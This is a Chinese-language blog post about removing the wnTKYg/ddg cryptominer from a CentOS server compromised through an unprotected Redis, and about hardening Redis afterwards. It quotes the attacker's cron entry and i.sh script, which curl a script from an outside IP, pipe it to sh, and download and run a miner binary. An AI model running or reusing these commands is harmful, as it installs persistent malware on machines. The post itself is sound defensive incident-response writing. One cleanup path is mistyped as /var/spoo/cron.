Centos redis漏洞入侵 清除wnTKYg病毒

时间:2021-12-11 03:38:59

今天同事说服务器很慢,查下进程发现CPU被占满,有一个进程命令是"wnTKYg"

Centos redis漏洞入侵 清除wnTKYg病毒

找到原因是因为昨天装了redis没有做好安全预防工作,黑客利用redis漏洞进行挖矿

Centos redis漏洞入侵 清除wnTKYg病毒


解决思路:

停止wnTKY进程,pkill -9 wnTKY

停止完发现进程还会自动启动

应该是计划任务里面设置任务了

crontab -e

*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh

要把个任务计划删除,同时执行crontab -l使新任务计划生效

通过i.sh脚本内容如下

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin


echo "*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://???.248.40.228:9999/i.sh?6 | sh" > /var/spool/cron/crontabs/root


if [ ! -f "/tmp/ddg.1009" ]; then
    curl -fsSL http://218.248.40.228:9999/1009/ddg.$(uname -m) -o /tmp/ddg.1009
fi
chmod +x /tmp/ddg.1009 && /tmp/ddg.1009
脚本已经又建立了两个定期下载的脚本在  /var/spool/cron/root  /var/spool/cron/crontabs/root  这两个文件

最后给挖矿文件授权可执行的权限,最后运行/tmp/ddg.1009这个挖矿文件

Centos redis漏洞入侵 清除wnTKYg病毒

要同时删除这两个文件才行

rm -rf  /var/spool/cron/root

rm -rf  /var/spool/cron/crontabs/root


或则直接删除 /var/spool/cron这个文件夹

rm -rf /var/spoo/cron

删除文件之后要在次删除相关进程,ddg.1009,这个进程要删除掉

ps -aux|grep ddg 


防止REDIS再次攻击的方法

把默认的端口号6379给改了
把密码改的更复杂了
把bind xx.xx.x.x   xx.xx.xx.xx改了

关闭挖矿的服务器访问

iptables -A INPUT -s  xmr.crypto-pool.fr -j DROP

iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP